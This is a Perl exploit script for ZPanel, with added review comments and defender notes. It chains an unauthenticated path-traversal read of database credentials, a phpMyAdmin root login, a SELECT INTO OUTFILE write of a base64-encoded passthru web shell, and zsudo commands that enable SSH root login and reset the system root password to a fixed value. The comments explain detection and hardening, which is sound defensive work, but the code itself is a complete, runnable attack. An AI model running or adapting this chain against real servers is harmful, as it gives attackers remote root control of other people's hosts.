#!/usr/bin/perl
#********************************************************************************
#
#
# Unauthenticated Zpanel Remote Root Exploit
# japp@0xlabs.com
# http://www.0xlabs.com
#
#
#********************************************************************************


13 | use LWP::UserAgent; | |
14 | ||
# NOTE(review): the file has no 'use strict' / 'use warnings', so these three
# are package globals; GetPasswd, AccessPma, GetDocRoot and UploadShell read
# them directly. They are the ZPanel-relative paths the script drives:
#   FILE_DISCLOSURE - the bundled pChart2 example viewer, with a traversal
#                     sequence in its Script parameter pointing at cnf/db.php
#                     (the file holding the database credentials).
#   PMA_PATH        - the bundled phpMyAdmin login page.
#   PMA_DOCROOT     - phpMyAdmin's import.php, used to submit SQL.
# Defender notes: the pChart examples directory is sample code, not needed in
# production; removing it (and patching ZPanel) closes the entry point. A
# request whose Script parameter contains "../" is the obvious thing to alert on.
$FILE_DISCLOSURE = "etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php";
$PMA_PATH = "etc/apps/phpmyadmin/index.php";
$PMA_DOCROOT = "etc/apps/phpmyadmin/import.php";

# Banner.
print "\n\n";
print "\t================================\n";
print "\t[ Zpanel Remote Root Exploit ]\n";
print "\t[ By japp\@0xlabs.com ]\n";
print "\t[ www.0xlabs.com ]\n";
print "\t================================\n\n";


# Exactly one argument, the base URL of the ZPanel install, is required.
# Assigning @ARGV to a scalar yields its element count.
my $argc = @ARGV;

if ( $argc != 1 )
{
    print " [*] Usage: ".$0." <http://localhost/zpanel/>\n";
    exit 1;
}

my $ua = http_handler();
my $url = $ARGV[0];

# Normalise the target: default to http:// and make sure it ends in "/" so
# the relative paths above concatenate cleanly. The scheme check only looks
# for a leading "http", so any string starting with those letters passes.
if ( $url !~ /^http/ ){ $url = "http://".$url; }
if ( $url !~ /\/$/ ) { $url .= "/"; }

# The chain, in order. Stages 1-4 die with a "[-]" message on failure;
# stages 5 and 6 never inspect their responses, so the final "[+]" lines
# are printed whether or not they worked.
#  1. GetPasswd    - read the MySQL root password out of cnf/db.php via the
#                    unauthenticated file disclosure.
#  2. AccessPma    - log in to the bundled phpMyAdmin as MySQL "root".
#  3. GetDocRoot   - query zpanel_core.x_settings for the web document root.
#  4. UploadShell  - SELECT ... INTO OUTFILE a PHP one-liner into that root.
#  5. EnableRoot   - through that file, run zsudo/sed to set PermitRootLogin yes.
#  6. ChangePasswd - through that file, run zsudo/chpasswd to set root's
#                    password to the fixed string "0xlabs".
# Everything after stage 1 assumes the credentials in cnf/db.php are MySQL
# root's and that mysqld can write into the web root. The fixed file name
# "0xlabs.php" and the fixed password are indicators of compromise.
print " [*] Trying to get MySQL root password...\n";
my $root_pass = GetPasswd ($url, $ua);
print " [+] Mysql root password: ".$root_pass."\n";

print " [*] Trying to access through phpMyAdmin...\n";
my $token = AccessPma ($root_pass, $url, $ua);
print " [+] Login successfully\n";

print " [*] Getting Zpanel document root...\n";
my $docroot = GetDocRoot ($token, $url, $ua);
print " [+] Zpanel document root: ".$docroot."\n";

print " [*] Uploading shell...\n";
UploadShell ($token, $docroot, $url, $ua);
print " [+] Shell uploaded successfully!\n";

print " [+] Enabling SSH root login\n";
EnableRoot ($url, $ua);

print " [*] Changing root password...\n";
ChangePasswd ($url, $ua);

print " [+] Root password changed\n\n";
print " [!] Now you can login through SSH. Root password is '0xlabs'\n\n";
65 | ||
# Stage 6: set the system root password through the PHP file UploadShell wrote.
# Parameters: $url - normalised base URL; $ua - the LWP::UserAgent.
# The response object is assigned and discarded; no status or body check is
# made, so the caller's "Root password changed" message is unconditional.
# The 'c' value is executed by the one-liner (passthru of $_GET["c"]): it
# changes into ZPanel's bin directory and invokes the bundled zsudo helper
# with an argument string that pipes a "root:0xlabs" line into
# /usr/sbin/chpasswd; "%23" decodes to "#", commenting out the rest of the
# line. zsudo is presumably a privileged (setuid-style) helper -- not visible
# here, but the chain only works if it is -- and that helper being reachable
# from the web-server account is the privilege boundary that fails.
# Defender notes: the access log will typically hold the request for
# 0xlabs.php with the command text in the query string, and root's entry in
# /etc/shadow changing during a web session is a strong signal.
sub ChangePasswd
{
    my $url = $_[0];
    my $ua = $_[1];

    my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"root:0xlabs\'\" \"|/usr/sbin/chpasswd;%23\"");
}
73 | ||
# Stage 5: turn on SSH root login through the PHP file UploadShell wrote.
# Parameters: $url - normalised base URL; $ua - the LWP::UserAgent.
# As in ChangePasswd the response is discarded and nothing is verified.
# The 'c' value runs zsudo with a sed -i that rewrites "PermitRootLogin no"
# to "PermitRootLogin yes" in /etc/ssh/*hd_config (the glob matches
# sshd_config); "%23" decodes to "#" and comments out the remainder.
# Defender notes: the rewritten sshd_config is a durable host artifact --
# file-integrity monitoring or config drift detection on /etc/ssh catches it,
# and PermitRootLogin flipping to yes outside a change window is a clear
# alarm condition. Disallowing password authentication for root entirely
# makes stage 6 pointless even if this edit succeeds.
sub EnableRoot
{
    my $url = $_[0];
    my $ua = $_[1];

    my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"\';sed -i \'s-PermitRootLogin no-PermitRootLogin yes-g\'\" \"/etc/ssh/*hd_config %23\"");

}
82 | ||
# Stage 4: write a PHP one-liner into the ZPanel document root via phpMyAdmin.
# Parameters: $token   - phpMyAdmin session token from AccessPma;
#             $docroot - filesystem path from GetDocRoot (assumed to end in
#                        "/", since "0xlabs.php" is appended directly);
#             $url, $ua - as elsewhere.
# Dies if the file is not reachable afterwards or does not echo the probe.
# The SQL is "SELECT '<php>' INTO OUTFILE '<docroot>0xlabs.php'"; the base64
# payload decodes to passthru($_GET["c"]);, a command-execution backdoor keyed
# on the 'c' query parameter. It is submitted through phpMyAdmin's import.php
# with ajax_request=true; the body http_post returns is discarded, and success
# is inferred only from the follow-up GET echoing "0xlabs_rulz".
# Defender notes: INTO OUTFILE is performed by the mysqld process, so this
# needs the FILE privilege and a secure_file_priv that permits the web root.
# Pointing secure_file_priv at a dedicated directory (or disabling file
# output), and not running the application on the MySQL root account, both
# break this stage. A new .php file in the web root typically owned by the
# MySQL service user is the host artifact to alert on.
sub UploadShell
{
    my $token = $_[0];
    my $docroot = $_[1];
    my $url = $_[2];
    my $ua = $_[3];

    my %pdata;

    $pdata{"token"} = $token;
    $pdata{"sql_query"} = "SELECT '<?php eval(base64_decode(\"cGFzc3RocnUoJF9HRVRbImMiXSk7\"));?>' INTO OUTFILE '".$docroot."0xlabs.php'";
    $pdata{"ajax_request"} = "true";

    # $PMA_DOCROOT is the package global set at the top of the file.
    http_post ($url.$PMA_DOCROOT, $ua, %pdata);

    # Probe: the one-liner should run "echo 0xlabs_rulz" and return it.
    my $rsp = $ua->get ($url."0xlabs.php?c=echo 0xlabs_rulz");

    if (!$rsp->is_success)
    {
        die (" [-] Can't locate uploaded shell at '".$url."0xlabs.php'\n");
    }
    my $cont = $rsp->content;

    if ( $cont !~ /0xlabs_rulz/ )
    {
        die (" [-] Can't validate uploaded shell. Check manually: ".$url."0xlabs.php?c=dir\n");
    }
}
111 | ||
# Stage 3: look up ZPanel's document root from its own settings table.
# Parameters: $token - phpMyAdmin token; $url, $ua - as elsewhere.
# Returns the captured cell text via $1. The match result is never checked:
# a failed match leaves $1 untouched, so the return may be a stale value or
# undef, and the caller does not check it either.
# The query reads so_value_tx for so_name_vc='zpanel_root' from
# zpanel_core.x_settings through phpMyAdmin's import.php, then scrapes the
# rendered HTML grid cell (class="data grid_edit") -- fragile against any
# change in phpMyAdmin's markup.
sub GetDocRoot
{
    my $token = $_[0];
    my $url = $_[1];
    my $ua = $_[2];

    my %pdata;

    $pdata{"token"} = $token;
    $pdata{"sql_query"} = "SELECT so_value_tx FROM zpanel_core.x_settings WHERE so_name_vc='zpanel_root'";
    $pdata{"ajax_request"} = "true";

    # $PMA_DOCROOT is the package global set at the top of the file.
    my $cont = http_post ($url.$PMA_DOCROOT, $ua, %pdata);

    $cont =~ /class=\"data grid_edit\s*">([^<]+)<\/td>/;

    return $1;
}
130 | ||
# Stage 2: log in to the bundled phpMyAdmin as MySQL "root".
# Parameters: $root_pass - password recovered by GetPasswd; $url, $ua.
# Returns the post-login token scraped from a "?token=..." link, via an
# unchecked $1 (same caveat as GetDocRoot). Dies if the login page is not
# reachable or the response carries phpMyAdmin's "Cannot log in" message.
# Flow: GET the login form, scrape its token field, POST root/$root_pass
# with that token, then scrape the session token from the result. Both
# capture regexes use a greedy (.+) up to a '"', which can over-capture when
# another quote follows on the same line. The login cookie presumably lands in
# the UA's cookie jar (see http_handler), which is what would let GetDocRoot
# and UploadShell reuse the session -- confirm against phpMyAdmin's behaviour.
# Defender notes: a root login to phpMyAdmin from an address that just
# requested the pChart viewer is the correlation to look for. Not exposing
# phpMyAdmin on the same vhost as the panel, and not using the MySQL root
# account for the application, remove this stage.
sub AccessPma
{
    my $root_pass = $_[0];
    my $url = $_[1];
    my $ua = $_[2];

    my %pdata;

    # $PMA_PATH is the package global set at the top of the file.
    my $rsp = $ua->get ($url.$PMA_PATH);

    if (!$rsp->is_success) {
        die (" [-] Can't access to phpMyAdmin at '".$url.$PMA_PATH."'\n");
    }

    my $cont = $rsp->content;

    $cont =~ /name=\"token\" value=\"(.+)\"/;

    my $token = $1;

    $pdata{"pma_username"} = "root";
    $pdata{"pma_password"} = $root_pass;
    $pdata{"server"} = "1";
    $pdata{"lang"} = "en";
    $pdata{"collation_connection"} = "utf8_general_ci";
    $pdata{"token"} = $token;

    $cont = http_post ($url.$PMA_PATH, $ua, %pdata);

    if ( $cont =~ /Cannot log in to the MySQL server/ )
    {
        die (" [-] Cannot log in to phpMyAdmin\n");
    }

    $cont =~ /\?token=(.+)\"/;

    return $1;
}
169 | ||
170 | ||
171 | ||
# Stage 1: recover the MySQL root password from cnf/db.php.
# Parameters: $url - base URL; $ua - user agent.
# Returns the fourth highlighted string literal found in the viewer's output.
# If fewer than four match, execution falls off the end of the sub and the
# caller receives undef, prints it, and carries on with an undefined password.
# Dies if the fetch fails or the body does not contain "root".
# The pChart example viewer renders the requested file as syntax-highlighted
# PHP source; #DD0000 is PHP's default highlight colour for string literals,
# so the loop walks the highlighted strings and assumes the password is the
# fourth -- a positional guess tied to the layout of db.php. The class
# [^\"^\'] also excludes a literal '^', which looks unintentional.
# Defender notes: this is the unauthenticated entry point. Sample and example
# directories shipped inside third-party libraries should not be reachable
# over the web, and a credentials file should never be readable through a
# "view source" feature; a request for this URL with "../" in Script is the
# indicator to alert on.
sub GetPasswd
{
    my $url = $_[0];
    my $ua = $_[1];


    # $FILE_DISCLOSURE is the package global set at the top of the file.
    my $rsp = $ua->get ($url.$FILE_DISCLOSURE);

    if (!$rsp->is_success) {
        die (" [-] Can't get '".$url."'. Check URL.\n");
    }

    my $cont = $rsp->content;

    if ( $cont !~ /root/ )
    {
        die (" [-] Can't get root password. Patched?\n");
    }

    my $flag = 0;
    while ( $cont =~ /#DD0000\">[\'\"]+([^\"^\']+)[\'\"]+/g )
    {
        $flag++;
        if ( $flag == 4 )
        {
            return $1;
        }
    }

}
202 | ||
# Thin wrapper: POST the key/value pairs in %data as a form body to $host
# with the supplied LWP::UserAgent and hand back the response body.
# The HTTP status is not examined here; callers scrape the body directly.
sub http_post
{
    my ($host, $ua, %data) = @_;

    return $ua->post($host, [%data])->content;
}
211 | ||
# Build the LWP::UserAgent every stage shares.
# Returns the configured agent, or -1 if construction yields a false value
# (LWP::UserAgent->new does not normally do that, and the caller never checks).
# Settings: a spoofed desktop browser User-Agent, a 10-second timeout, only
# http/https allowed, an in-memory cookie jar (presumably so the phpMyAdmin
# session cookie survives across calls -- confirm), and redirects followed
# for both GET and POST.
sub http_handler
{
    my $agent = LWP::UserAgent->new();
    return -1 unless $agent;

    $agent->agent("Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6");
    $agent->timeout(10);
    $agent->protocols_allowed(['http','https']);
    $agent->cookie_jar({});

    # POST is not redirectable by default in LWP; add it alongside GET.
    push @{ $agent->requests_redirectable }, 'GET', 'POST';

    return $agent;
}